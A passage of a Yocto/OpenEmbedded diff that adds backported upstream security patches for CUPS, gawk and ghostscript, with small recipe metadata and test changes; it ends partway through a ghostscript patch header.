diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
new file mode 100644
index 0000000000..1fa5a54c70
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
@@ -0,0 +1,33 @@
+From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 26 May 2022 06:27:04 +0200
+Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes
+ CVE-2022-26691)
+
+The previous algorithm didn't expect the strings can have a different
+length, so one string can be a substring of the other and such substring
+was reported as equal to the longer string.
+
+CVE: CVE-2022-26691
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444]
+Signed-off-by: Steve Sakoman
+
+---
+diff --git a/scheduler/cert.c b/scheduler/cert.c
+index b268bf1b2..9b65b96c9 100644
+--- a/scheduler/cert.c
++++ b/scheduler/cert.c
+@@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */
+ b ++;
+ }
+
+- return (result);
++ /*
++ * The while loop finishes when *a == '\0' or *b == '\0'
++ * so after the while loop either both *a and *b == '\0',
++ * or one points inside a string, so when we apply logical OR on *a,
++ * *b and result, we get a non-zero return value if the compared strings don't match.
++ */
++
++ return (result | *a | *b);
+ }
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
new file mode 100644
index 0000000000..40b89c9899
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
@@ -0,0 +1,36 @@
+From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 1 Jun 2023 12:04:00 +0200
+Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324)
+
+CVE: CVE-2023-32324
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589]
+
+(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e)
+Signed-off-by: Sanjay Chitroda <schitrod@cisco.com>
+---
+ cups/string.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/cups/string.c b/cups/string.c
+index 93cdad19..6ef58515 100644
+--- a/cups/string.c
++++ b/cups/string.c
+@@ -1,6 +1,7 @@
+ /*
+ * String functions for CUPS.
+ *
++ * Copyright © 2023 by OpenPrinting.
+ * Copyright © 2007-2019 by Apple Inc.
+ * Copyright © 1997-2007 by Easy Software Products.
+ *
+@@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */
+ size_t srclen; /* Length of source string */
+
+
++ if (size == 0)
++ return (0);
++
+ /*
+ * Figure out how much room is needed...
+ */
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
new file mode 100644
index 0000000000..4d39e1e57f
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
@@ -0,0 +1,31 @@
+From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001
+From: Michael R Sweet <michael.r.sweet@gmail.com>
+Date: Tue, 6 Dec 2022 09:04:01 -0500
+Subject: [PATCH] Require authentication for CUPS-Get-Document.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913]
+CVE: CVE-2023-32360
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ conf/cupsd.conf.in | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in
+index b258849078..a07536f3e4 100644
+--- a/conf/cupsd.conf.in
++++ b/conf/cupsd.conf.in
+@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@
+ Order deny,allow
+ </Limit>
+
+- <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document>
++ <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job>
++ Require user @OWNER @SYSTEM
++ Order deny,allow
++ </Limit>
++
++ <Limit CUPS-Get-Document>
++ AuthType Default
+ Require user @OWNER @SYSTEM
+ Order deny,allow
+ </Limit>
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
new file mode 100644
index 0000000000..816efc2946
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
@@ -0,0 +1,65 @@
+From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001
+From: Rose <83477269+AtariDreams@users.noreply.github.com>
+Date: Thu, 1 Jun 2023 11:33:39 -0400
+Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection
+
+httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to.
+
+We have to log the hostname first.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2]
+CVE: CVE-2023-34241
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ scheduler/client.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/scheduler/client.c b/scheduler/client.c
+index 91e441188c..327473a4d1 100644
+--- a/scheduler/client.c
++++ b/scheduler/client.c
+@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ /*
+ * Can't have an unresolved IP address with double-lookups enabled...
+ */
+-
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "Name lookup failed - connection from %s closed!",
++ "Name lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
+
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ * with double-lookups enabled...
+ */
+
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "IP lookup failed - connection from %s closed!",
++ "IP lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+
+ if (!hosts_access(&wrap_req))
+ {
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+ "Connection from %s refused by /etc/hosts.allow and "
+ "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
new file mode 100644
index 0000000000..be0db1fbd4
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
@@ -0,0 +1,40 @@
+From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Fri, 1 Sep 2023 16:47:29 +0200
+Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504
+
+We didn't check for end of buffer if it looks there is an escaped
+character - check for NULL terminator there and if found, return NULL
+as return value and in `ptr`, because a lone backslash is not
+a valid PostScript character.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31]
+CVE: CVE-2023-4504
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ cups/raster-interpret.c | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+--- a/cups/raster-interpret.c
++++ b/cups/raster-interpret.c
+@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S
+
+ cur ++;
+
+- if (*cur == 'b')
++ /*
++ * Return NULL if we reached NULL terminator, a lone backslash
++ * is not a valid character in PostScript.
++ */
++
++ if (!*cur)
++ {
++ *ptr = NULL;
++
++ return (NULL);
++ }
++
++ if (*cur == 'b')
+ *valptr++ = '\b';
+ else if (*cur == 'f')
+ *valptr++ = '\f';
diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
index 65a99fc28d..e726899c52 100644
--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
SUMMARY = "Collection of autoconf m4 macros"
SECTION = "base"
HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
+DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
@@ -13,7 +14,7 @@ do_configure() {
}
do_install() {
- oe_runmake CWAUTOMACROSPREFIX=${D}${prefix} install
+ oe_runmake LABEL=`date -d @${SOURCE_DATE_EPOCH} +%Y%m%d` CWAUTOMACROSPREFIX=${D}${prefix} install
# cleanup buildpaths in autogen.sh
sed -i -e 's,${D},,g' ${D}${prefix}/share/cwautomacros/scripts/autogen.sh
diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb
index 886c3ddcab..60e6a3d34e 100644
--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
SUMMARY = "Line-oriented text editor"
HOMEPAGE = "http://www.gnu.org/software/ed/"
+DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
new file mode 100644
index 0000000000..c6cba058a7
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
@@ -0,0 +1,28 @@
+From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001
+From: "Arnold D. Robbins" <arnold@skeeve.com>
+Date: Wed, 3 Aug 2022 13:00:54 +0300
+Subject: [PATCH] Smal bug fix in builtin.c.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security
+Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212]
+CVE: CVE-2023-4156
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog | 6 ++++++
+ builtin.c | 5 ++++-
+ 2 files changed, 10 insertions(+), 1 deletion(-)
+
+--- gawk-5.1.0.orig/builtin.c
++++ gawk-5.1.0/builtin.c
+@@ -957,7 +957,10 @@ check_pos:
+ s1++;
+ n0--;
+ }
+- if (val >= num_args) {
++ // val could be less than zero if someone provides a field width
++ // so large that it causes integer overflow. Mainly fuzzers do this,
++ // but let's try to be good anyway.
++ if (val < 0 || val >= num_args) {
+ toofew = true;
+ break;
+ }
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
new file mode 100644
index 0000000000..167c0787ee
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
@@ -0,0 +1,24 @@
+These tests require an unloaded host as otherwise timing sensitive tests can fail
+https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+--- a/test/Maketests~
++++ b/test/Maketests
+@@ -2069,7 +2069,2 @@
+
+-timeout:
+- @echo $@ $(ZOS_FAIL)
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+ typedregex1:
+@@ -2297,7 +2292,2 @@
+ @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+-time:
+- @echo $@
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+
diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb
index e79ccfdebf..c71890c19e 100644
--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
+ file://remove-sensitive-tests.patch \
file://run-ptest \
+ file://CVE-2023-4156.patch \
"
SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
do_install_ptest() {
mkdir ${D}${PTEST_PATH}/test
ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
- for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \
- do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \
+ # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
+ TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
+ for i in $TESTS Maketests inclib.awk; do
+ cp ${S}/test/$i* ${D}${PTEST_PATH}/test
done
sed -i -e 's|/usr/local/bin|${bindir}|g' \
-e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
- sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+ sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+
+ # These tests require an unloaded host as otherwise timing sensitive tests can fail
+ # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+ rm -f ${D}${PTEST_PATH}/test/time.*
+ rm -f ${D}${PTEST_PATH}/test/timeout.*
}
RDEPENDS_${PN}-ptest += "make"
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
new file mode 100644
index 0000000000..91b9f6df50
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
@@ -0,0 +1,31 @@
+From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 17 Jul 2023 14:06:37 +0100
+Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from
+ devices/gdevpcx.c
+
+Bounds check the buffer, before dereferencing the pointer.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f]
+CVE: CVE-2023-38559
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gdevdevn.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gdevdevn.c b/base/gdevdevn.c
+index 3b019d6..2888776 100644
+--- a/base/gdevdevn.c
++++ b/base/gdevdevn.c
+@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file
+ byte data = *from;
+
+ from += step;
+- if (data != *from || from == end) {
++ if (from >= end || data != *from) {
+ if (data >= 0xc0)
+ gp_fputc(0xc1, file);
+ } else {
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
new file mode 100644
index 0000000000..ea8bf26f3f
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
@@ -0,0 +1,109 @@
+From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Wed, 20 May 2020 16:02:07 +0100
+Subject: [PATCH] txtwrite - address memory problems
+
+Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)"
+Also bug #702346 and the earlier report #701877.
+
+The problems occur because its possible for a single character code in
+a PDF file to map to more than a single Unicode code point. In the case
+of the file for 701877 the character code maps to 'f' and 'i' (it is an
+fi ligature).
+
+The code should deal with this, but we need to ensure we are using the
+correct index. In addition, if we do get more Unicode code points than
+we expected, we need to set the widths of the 'extra' code points to
+zero (we only want to consider the width of the original character).
+
+This does mean increasing the size of the Widths array to cater for
+the possibility of more entries on output than there were on input.
+
+While working on it I noticed that the Unicode remapping on little-
+endian machines was reversing the order of the Unicode values, when
+there was more than a single code point returned, so fixed that at
+the same time.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874]
+CVE: CVE-2020-36773
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/vector/gdevtxtw.c | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c
+index 87f9355..bddce5a 100644
+--- a/devices/vector/gdevtxtw.c
++++ b/devices/vector/gdevtxtw.c
+@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph,
+ #else
+ b = (char *)Buffer;
+ u = (char *)unicode;
+- while (l >= 0) {
+- *b++ = *(u + l);
+- l--;
+- }
+
++ for (l=0;l<length;l+=2, u+=2){
++ *b++ = *(u+1);
++ *b++ = *u;
++ }
+ #endif
+ gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer");
+ return length / sizeof(short);
+@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ &penum->text_state->matrix, &wanted);
+ pte->returned.total_width.x += wanted.x;
+ pte->returned.total_width.y += wanted.y;
+- penum->Widths[pte->index - 1] = wanted.x;
++ penum->Widths[penum->TextBufferIndex] = wanted.x;
+
+ if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) {
+ gs_point tpt;
+@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ pte->returned.total_width.x += dpt.x;
+ pte->returned.total_width.y += dpt.y;
+
+- penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
+- penum->Widths[pte->index - 1] += dpt.x;
++ penum->Widths[penum->TextBufferIndex] += dpt.x;
++ code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
++ /* If a single text code returned multiple Unicode values, then we need to set the
++ * 'extra' code points' widths to 0.
++ */
++ if (code > 1)
++ memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float));
++ penum->TextBufferIndex += code;
+ }
+ return 0;
+ }
+@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!penum->text_state->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory,
+ penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer");
+@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!unsorted_entry->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory,
+ (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer");
+@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte)
+ if (!penum->TextBuffer)
+ return gs_note_error(gs_error_VMerror);
+ penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory,
+- pte->text.size, sizeof(float), "txtwrite temporary widths array");
++ pte->text.size * 4, sizeof(float), "txtwrite temporary widths array");
+ if (!penum->Widths)
+ return gs_note_error(gs_error_VMerror);
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
new file mode 100644
index 0000000000..033ba77f9a
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
@@ -0,0 +1,121 @@
+From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Thu, 20 Aug 2020 17:19:09 +0100
+Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions
+
+Firstly, in gx_device_delete_output_file the iodev pointer was being passed
+to the delete_method incorrectly (passing a pointer to that pointer). Thus
+when we attempted to use that to confirm permission to delete the file, it
+crashed. Credit to Ken for finding that.
+
+Secondly, due to the way pdfwrite works, when running with an output file per
+page, it creates the current output file immediately it has completed writing
+the previous one. Thus, it has to delete that partial file on exit.
+
+Previously, the output file was not added to the "control" permission list,
+so an attempt to delete it would result in an error. So add the output file
+to the "control" as well as "write" list.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gsdevice.c | 2 +-
+ base/gslibctx.c | 20 ++++++++++++++------
+ 2 files changed, 15 insertions(+), 7 deletions(-)
+
+diff --git a/base/gsdevice.c b/base/gsdevice.c
+index 913119495..ac78af93f 100644
+--- a/base/gsdevice.c
++++ b/base/gsdevice.c
+@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname)
+ parsed.len = strlen(parsed.fname);
+ }
+ if (parsed.iodev)
+- code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname);
++ code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname);
+ else
+ code = gs_note_error(gs_error_invalidfileaccess);
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index d726c58b5..ff8fc895e 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ rewrite_percent_specifiers(f);
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (code < 0)
+ return code;
+ break;
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
++ if (code < 0)
++ return code;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_add_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_add_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ /* Try to rewrite any %d (or similar) in the string */
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ the pipe_fopen(), the leading '|' has been stripped.
+ */
+ code = gs_remove_control_path(mem, gs_permit_file_writing, f);
++ if (code < 0)
++ return code;
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+ break;
+@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_remove_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+--
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
new file mode 100644
index 0000000000..beade79eef
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
@@ -0,0 +1,37 @@
+From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 24 Aug 2020 09:24:31 +0100
+Subject: [PATCH] Coverity 361429: move "break" to correct place.
+
+We had to add the outputfile to the "control" file permission list (as well
+as write), but for the "pipe" case, I accidentally added the call after the
+break out of loop that checks for a pipe.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gslibctx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index ff8fc895e..63dfbe2e0 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ code = gs_add_control_path(mem, gs_permit_file_writing, f);
+ if (code < 0)
+ return code;
+- break;
+ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
++ break;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+--
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
new file mode 100644
index 0000000000..e3f9e81c45
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
@@ -0,0 +1,238 @@
+From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Tue, 7 Sep 2021 20:36:12 +0100
+Subject: [PATCH] Bug 704342: Include device specifier strings in access
+ validation
+
+for the "%pipe%", %handle%" and %printer% io devices.
+
+We previously validated only the part after the "%pipe%" Postscript device
+specifier, but this proved insufficient.
+
+This rebuilds the original file name string, and validates it complete. The
+slight complication for "%pipe%" is it can be reached implicitly using
+"|" so we have to check both prefixes.
+
+Addresses CVE-2021-3781
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gdevpipe.c | 22 +++++++++++++++-
+ base/gp_mshdl.c | 11 +++++++-
